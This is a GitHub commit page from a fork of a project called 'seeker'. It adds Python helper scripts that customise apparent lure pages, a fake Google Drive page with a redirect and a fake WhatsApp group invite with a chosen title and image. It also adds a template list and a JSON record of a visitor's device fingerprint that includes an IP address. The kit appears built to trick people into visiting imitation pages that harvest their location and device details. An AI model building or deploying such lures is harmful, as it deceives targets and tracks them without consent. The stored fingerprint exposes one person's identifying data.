forked from thewhiteh4t/seeker
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing
26 changed files
with
19,044 additions
and
220 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Empty file.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,14 @@ | ||
#!/usr/bin/env python3 | ||
|
||
R = '\033[31m' # red | ||
G = '\033[32m' # green | ||
C = '\033[36m' # cyan | ||
W = '\033[0m' # white | ||
|
||
redirect = input(G + '[+]' + C + ' Enter GDrive File URL : ' + W) | ||
with open('template/gdrive/js/location_temp.js', 'r') as js: | ||
reader = js.read() | ||
update = reader.replace('REDIRECT_URL', redirect) | ||
|
||
with open('template/gdrive/js/location.js', 'w') as js_update: | ||
js_update.write(update) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
#!/usr/bin/env python3 | ||
|
||
import os | ||
import shutil | ||
|
||
R = '\033[31m' # red | ||
G = '\033[32m' # green | ||
C = '\033[36m' # cyan | ||
W = '\033[0m' # white | ||
|
||
title = input(G + '[+]' + C + ' Group Title : ' + W) | ||
image = input(G + '[+]' + C + ' Path to Group Img (Best Size : 300x300): ' + W) | ||
|
||
img_name = image.split('/')[-1] | ||
try: | ||
shutil.copyfile(image, 'template/whatsapp/images/{}'.format(img_name)) | ||
except Exception as e: | ||
print('\n' + R + '[-]' + C + ' Exception : ' + W + str(e)) | ||
exit() | ||
|
||
with open('template/whatsapp/index_temp.html', 'r') as index_temp: | ||
code = index_temp.read() | ||
code = code.replace('$TITLE$', title) | ||
code = code.replace('$IMAGE$', 'images/{}'.format(img_name)) | ||
|
||
with open('template/whatsapp/index.html', 'w') as new_index: | ||
new_index.write(code) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
{"dev":[{"platform":"Win32","browser":"Chrome\/81.0.4044.92","cores":"8","ram":"8","vendor":"Google Inc.","render":"ANGLE (NVIDIA GeForce GTX 1070 Direct3D11 vs_5_0 ps_5_0)","ip":"146.196.34.142","ht":"1080","wd":"1920","os":"Win64"}]} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,22 @@ | ||
{ | ||
"templates": [ | ||
{ | ||
"name": "NearYou", | ||
"dir_name": "nearyou", | ||
"module": false, | ||
"import_file": null | ||
}, | ||
{ | ||
"name": "Google Drive", | ||
"dir_name": "gdrive", | ||
"module": true, | ||
"import_file": "mod_gdrive" | ||
}, | ||
{ | ||
"name": "WhatsApp", | ||
"dir_name": "whatsapp", | ||
"module": true, | ||
"import_file": "mod_whatsapp" | ||
} | ||
] | ||
} |
Oops, something went wrong.